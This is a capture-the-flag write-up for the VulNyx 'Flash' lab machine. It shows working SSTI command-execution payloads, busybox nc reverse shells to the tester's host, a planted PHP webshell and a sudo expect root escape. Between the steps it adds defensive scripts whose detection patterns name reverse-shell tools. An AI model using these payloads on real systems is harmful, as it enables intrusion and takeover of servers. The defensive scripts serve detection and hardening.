VulNyx - Flash
Information
Flash is an easy-difficulty vulnerable Linux virtual machine from the VulNyx platform; it was created by the user d4t4s3c and runs correctly on the VirtualBox and VMware hypervisors.

Enumeration
Nmap
TCP
❯ nmap -n -Pn -sS -p- --min-rate 5000 192.168.1.130
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 11:58 CEST
Nmap scan report for 192.168.1.130
Host is up (0.0011s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
8080/tcp open http-proxy
❯ nmap -sVC -p22,80,8080 192.168.1.130
Starting Nmap 7.95 ( https://nmap.org ) at 2025-07-16 11:59 CEST
Nmap scan report for 192.168.1.130
Host is up (0.00037s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u1 (protocol 2.0)
| ssh-hostkey:
| 3072 f0:e6:24:fb:9e:b0:7a:1a:bd:f7:b1:85:23:7f:b1:6f (RSA)
| 256 99:c8:74:31:45:10:58:b0:ce:cc:63:b4:7a:82:57:3d (ECDSA)
|_ 256 60:da:3e:31:38:fa:b5:49:ab:48:c3:43:2c:9f:d1:32 (ED25519)
80/tcp open http nginx 1.18.0
|_http-server-header: nginx/1.18.0
|_http-title: Site doesn't have a title (text/html).
8080/tcp open http Werkzeug httpd 2.3.4 (Python 3.9.2)
|_http-server-header: Werkzeug/2.3.4 Python/3.9.2
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
Shell (randy)
80/TCP (HTTP)
Site

Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.130/ -x html,txt,php
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.130/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,txt,php
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html (Status: 200) [Size: 19]
Progress: 882180 / 882184 (100.00%)
===============================================================
Finished
===============================================================
8080/TCP (HTTP)
Site

Directory Brute Force
❯ gobuster dir -w /opt/directory-list-2.3-medium.txt -u http://192.168.1.130:8080/ html,txt,php --no-error
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.1.130:8080/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
Progress: 220545 / 220546 (100.00%)
===============================================================
Finished
===============================================================
Server Side Template Injection (SSTI)
The initial nmap scan identified that the HTTP server is Python-based, which suggests it could be an application built with Flask, which in turn could be vulnerable to template injection (SSTI) attacks.
8080/tcp open http Werkzeug httpd 2.3.4 (Python 3.9.2)
|_http-title: Site doesn't have a title (text/html; charset=utf-8).
|_http-server-header: Werkzeug/2.3.4 Python/3.9.2
Parameter Brute Force
I identify the name parameter as vulnerable to Server Side Template Injection (SSTI) using the payload {{5*5}}
❯ wfuzz -c -w /opt/common.txt -u "http://192.168.1.130:8080/?FUZZ={{5*5}}" --hh=18 2>/dev/null
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.1.130:8080/?FUZZ=
Total requests: 4746
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000002812: 200 0 L 2 W 17 Ch "name"
Total time: 7.355892
Processed Requests: 4746
Filtered Requests: 4745
Requests/sec.: 645.1970
Reverse Shell
I manage to execute commands as the user randy
❯ echo -n '{{request.application.__globals__.__builtins__.__import__("os").popen("id").read()}}' | jq -sRr @uri | xclip -sel clip
❯ curl -sX GET 'http://192.168.1.130:8080/?name=%7B%7Brequest.application.__globals__.__builtins__.__import__%28%22os%22%29.popen%28%22id%22%29.read%28%29%7D%7D'
<h2>Love uid=1000(randy) gid=1000(randy) grupos=1000(randy)
!</h2>#
With command execution confirmed, I try to obtain a reverse shell
❯ echo -n '{{request.application.__globals__.__builtins__.__import__("os").popen("busybox nc 192.168.1.5 443 -e /bin/sh").read()}}' | jq -sRr @uri | xclip -sel clip
❯ curl -sX GET 'http://192.168.1.130:8080/?name=%7B%7Brequest.application.__globals__.__builtins__.__import__%28%22os%22%29.popen%28%22busybox%20nc%20192.168.1.5%20443%20-e%20%2Fbin%2Fsh%22%29.read%28%29%7D%7D'
I get a shell as the user randy
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.130] 58480
id ; hostname
uid=1000(randy) gid=1000(randy) grupos=1000(randy)
flash
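From the defender's side, the probe ({{5*5}}) and the later command-execution requests all pass through the name parameter and are visible in the web server's access log. The following script is an added example, not code from the writeup or from the Flash machine: it URL-decodes the query string of each access-log line and flags Jinja2/Flask template-injection patterns, Python introspection chains, OS execution calls and reverse-shell command lines. The log lines are constructed for the demo (the third and fourth mirror the request shapes used above); the indicator list and severities are my own assumptions and should be tuned to the application.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (combined-style format). Not real logs
# from the machine; the shapes follow the requests shown in the writeup.
SAMPLE_LOG = """\
192.168.1.5 - - [16/Jul/2025:12:01:03 +0200] "GET /?name=Alice HTTP/1.1" 200 17
192.168.1.5 - - [16/Jul/2025:12:01:09 +0200] "GET /?name=%7B%7B5*5%7D%7D HTTP/1.1" 200 17
192.168.1.5 - - [16/Jul/2025:12:02:41 +0200] "GET /?name=%7B%7Brequest.application.__globals__.__builtins__.__import__%28%22os%22%29.popen%28%22id%22%29.read%28%29%7D%7D HTTP/1.1" 200 60
192.168.1.5 - - [16/Jul/2025:12:03:02 +0200] "GET /cmd.php?cmd=busybox%20nc%20192.168.1.5%20443%20-e%20%2Fbin%2Fsh HTTP/1.1" 200 0
"""

# Extract method and request target from the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Indicators ordered from "template probe" to "shell callback". Assumed
# severities; adjust to your environment.
INDICATORS = [
    ("ssti-probe", re.compile(r"\{\{.*?\}\}|\{%.*?%\}"), "medium"),
    ("python-introspection", re.compile(r"__(globals|builtins|import|class|mro|subclasses)__"), "high"),
    ("os-exec", re.compile(r"\b(popen|system|subprocess|os\.)"), "high"),
    ("reverse-shell-cmd", re.compile(r"\b(nc|ncat|busybox)\b.*-e\s*/bin/(ba)?sh"), "critical"),
]
SEVERITY_RANK = {"medium": 1, "high": 2, "critical": 3}


def decode_params(target):
    """Return (param, decoded value) pairs from a request target such as '/?name=%7B%7B5*5%7D%7D'.
    parse_qsl performs the percent-decoding, so the payload is inspected in clear text."""
    return parse_qsl(urlsplit(target).query, keep_blank_values=True)


def scan_line(line):
    """Return one finding per (parameter, indicator) match on a single log line."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    hits = []
    for param, value in decode_params(m.group("target")):
        for name, pattern, severity in INDICATORS:
            if pattern.search(value):
                hits.append({"param": param, "indicator": name, "severity": severity, "value": value})
    return hits


def scan_log(text):
    """Scan a whole log; each finding carries the 1-based line number."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for hit in scan_line(line):
            hit["line"] = lineno
            findings.append(hit)
    return findings


def worst_per_line(findings):
    """Collapse findings to the highest severity seen on each line."""
    worst = {}
    for f in findings:
        if SEVERITY_RANK[f["severity"]] > SEVERITY_RANK.get(worst.get(f["line"]), 0):
            worst[f["line"]] = f["severity"]
    return worst


if __name__ == "__main__":
    results = scan_log(SAMPLE_LOG)
    for f in results:
        print(f"line {f['line']}: [{f['severity']}] {f['indicator']} in param '{f['param']}': {f['value']}")
    print("worst per line:", worst_per_line(results))
```

Running it on the constructed log reports nothing for the benign request, a medium finding for the {{5*5}} probe, high findings for the introspection chain and the popen call, and a critical finding for the reverse-shell command line. A single probe followed within seconds by the introspection chain from the same source is the sequence worth alerting on.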
Shell (www-data)
Enumeration
Config Files
In the Nginx configuration file, I see that PHP code is only interpreted for the domain loveyouuuuu.nyx
randy@flash:~$ grep -v "#" /etc/nginx/sites-available/default
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
    location / {
        try_files $uri $uri/ =404;
    }
}
server {
    listen 80;
    listen [::]:80;
    server_name loveyouuuuu.nyx;
    root /var/www/html;
    index index.html;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.4-fpm.sock;
    }
}
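The security-relevant detail in that configuration is easy to miss when reading by hand: both server blocks share the document root /var/www/html, but only the loveyouuuuu.nyx block passes .php files to PHP-FPM, so anything written into that directory becomes executable under that Host header. The following is an added example, not part of the writeup: a minimal nginx configuration parser (constructed here; it is not nginx's own parser and ignores quoting) that lists each server block's name, root and whether it executes PHP, and maps document roots to the hostnames under which PHP runs. The configuration string is a copy of the two server blocks above.

```python
import re

# Constructed copy of the two server blocks shown in the writeup.
NGINX_CONF = r"""
server {
    listen 80 default_server;
    listen [::]:80 default_server;
    root /var/www/html;
    index index.html index.htm index.nginx-debian.html;
    server_name _;
    location / {
        try_files $uri $uri/ =404;
    }
}
server {
    listen 80;
    listen [::]:80;
    server_name loveyouuuuu.nyx;
    root /var/www/html;
    index index.html;
    location / {
        try_files $uri $uri/ =404;
    }
    location ~ \.php$ {
        include snippets/fastcgi-php.conf;
        fastcgi_pass unix:/run/php/php7.4-fpm.sock;
    }
}
"""

# Tokens are braces, semicolons, or runs of anything else.
TOKEN_RE = re.compile(r"\{|\}|;|[^\s{};]+")


def parse_nginx(text):
    """Parse config text into nested items:
    ('directive', name, args) or ('block', name, args, children).
    Comments are stripped first (simplification: '#' inside quotes is not handled)."""
    text = re.sub(r"#[^\n]*", "", text)
    items, _ = _parse(TOKEN_RE.findall(text), 0)
    return items


def _parse(tokens, i):
    items, words = [], []
    while i < len(tokens):
        tok = tokens[i]
        i += 1
        if tok == ";":
            if words:
                items.append(("directive", words[0], words[1:]))
            words = []
        elif tok == "{":
            children, i = _parse(tokens, i)
            items.append(("block", words[0], words[1:], children))
            words = []
        elif tok == "}":
            return items, i
        else:
            words.append(tok)
    return items, i


def directive(children, name, default=None):
    """First directive named `name` among `children`, returning its argument list."""
    for item in children:
        if item[0] == "directive" and item[1] == name:
            return item[2]
    return default


def executes_php(children):
    """True if a location matching .php hands requests to a FastCGI backend."""
    for item in children:
        if item[0] == "block" and item[1] == "location" and any(".php" in a for a in item[2]):
            if any(c[0] == "directive" and c[1] == "fastcgi_pass" for c in item[3]):
                return True
    return False


def audit_vhosts(text):
    """One summary dict per server block: name, document root, PHP execution."""
    report = []
    for blk in parse_nginx(text):
        if blk[0] != "block" or blk[1] != "server":
            continue
        children = blk[3]
        report.append({
            "server_name": " ".join(directive(children, "server_name", ["(none)"])),
            "root": directive(children, "root", [None])[0],
            "php_exec": executes_php(children),
        })
    return report


def php_roots(text):
    """Map each document root to the hostnames under which PHP files in it execute."""
    roots = {}
    for entry in audit_vhosts(text):
        if entry["php_exec"]:
            roots.setdefault(entry["root"], []).append(entry["server_name"])
    return roots


if __name__ == "__main__":
    for entry in audit_vhosts(NGINX_CONF):
        print(entry)
    print("PHP executes from:", php_roots(NGINX_CONF))
```

The output shows the default vhost serving /var/www/html without PHP and the loveyouuuuu.nyx vhost serving the same directory with PHP enabled. The mitigation is the usual one: a PHP-enabled document root must not be writable by the account the web application or any low-privilege user runs as, and vhosts with different execution policies should not share a root.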
Abuse
I create a PHP webshell in the path /var/www/html
randy@flash:~$ echo -n '<?php system($_GET["cmd"]); ?>' > /var/www/html/cmd.php
Reverse Shell
I get a shell as the user www-data
❯ echo -n 'busybox nc 192.168.1.5 443 -e /bin/sh' | jq -sRr @uri | xclip -sel clip
❯ curl -sX GET -H "Host: loveyouuuuu.nyx" "http://192.168.1.130/cmd.php?cmd=busybox%20nc%20192.168.1.5%20443%20-e%20%2Fbin%2Fsh"
❯ nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.1.5] from (UNKNOWN) [192.168.1.130] 35328
id ; hostname
uid=33(www-data) gid=33(www-data) groups=33(www-data)
flash
Privilege Escalation
Enumeration
Sudo
The user www-data can run the expect binary as root via sudo
www-data@flash:/$ sudo -l
Matching Defaults entries for www-data on flash:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User www-data may run the following commands on flash:
(root) NOPASSWD: /usr/bin/expect
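A NOPASSWD rule for a binary that can spawn a subprocess is equivalent to granting a root shell, which is what GTFOBins catalogues. The following is an added example, not part of the writeup: a small auditor that parses `sudo -l` output (the copy below is constructed from the output above) and flags rules whose target can spawn an interactive shell. The SHELL_CAPABLE set is my own subset of the GTFOBins sudo list and is an assumption; extend it from that source.

```python
import re
from os.path import basename

# Constructed copy of the `sudo -l` output shown above.
SUDO_L_OUTPUT = r"""
Matching Defaults entries for www-data on flash:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User www-data may run the following commands on flash:
    (root) NOPASSWD: /usr/bin/expect
"""

# Binaries that can spawn an interactive shell from within themselves.
# Assumed subset of the GTFOBins "sudo" category; not exhaustive.
SHELL_CAPABLE = {
    "expect", "vim", "vi", "less", "more", "find", "awk", "perl",
    "python", "python3", "bash", "sh", "env", "man", "ftp", "nmap",
}

# Matches lines such as "(root) NOPASSWD: /usr/bin/expect" or "(ALL : ALL) ALL".
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)+)?(?P<cmds>\S.*?)\s*$")


def parse_sudo_l(text):
    """Return one dict per command listed after the 'may run the following commands' header."""
    entries = []
    in_cmds = False
    for line in text.splitlines():
        if "may run the following commands" in line:
            in_cmds = True
            continue
        if not in_cmds:
            continue
        m = ENTRY_RE.match(line)
        if not m:
            continue
        tags = (m.group("tags") or "").replace(":", "").split()
        # Several commands may share one rule, separated by commas.
        for cmd in re.split(r",\s*", m.group("cmds")):
            entries.append({"runas": m.group("runas").strip(), "tags": tags, "command": cmd})
    return entries


def audit_sudo(text):
    """Annotate each rule with whether it is passwordless and whether it yields a root shell."""
    findings = []
    for e in parse_sudo_l(text):
        prog = basename(e["command"].split()[0])
        shell_capable = e["command"] == "ALL" or prog in SHELL_CAPABLE
        runas_user = e["runas"].split(":")[0].strip()
        findings.append({
            **e,
            "nopasswd": "NOPASSWD" in e["tags"],
            "shell_capable": shell_capable,
            "root_shell_risk": shell_capable and runas_user in ("root", "ALL"),
        })
    return findings


if __name__ == "__main__":
    for f in audit_sudo(SUDO_L_OUTPUT):
        flag = "ROOT SHELL" if f["root_shell_risk"] else "ok"
        print(f"{f['runas']:>10}  {'NOPASSWD' if f['nopasswd'] else 'password':>8}  {f['command']}  -> {flag}")
```

On the machine's output the single rule is reported as a passwordless root-shell risk. The fix is to remove the rule or replace it with a wrapper script that takes no user-controlled arguments, and to review sudoers with `visudo -c` and this kind of check after every change.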
Abuse
GTFOBins gives the shell-escape sequence, and with it I become the root user
www-data@flash:/$ sudo -u root /usr/bin/expect -c 'spawn /bin/sh;interact'
spawn /bin/sh
# bash -i
root@flash:/# id ; hostname
uid=0(root) gid=0(root) groups=0(root)
flash
Flags
Now as the root user, I can read the user.txt and root.txt flags
root@flash:/# find / -name user.txt -o -name root.txt 2>/dev/null |xargs cat
3838****************************
bc73****************************
That concludes the walkthrough of the Flash machine.
Happy Hacking!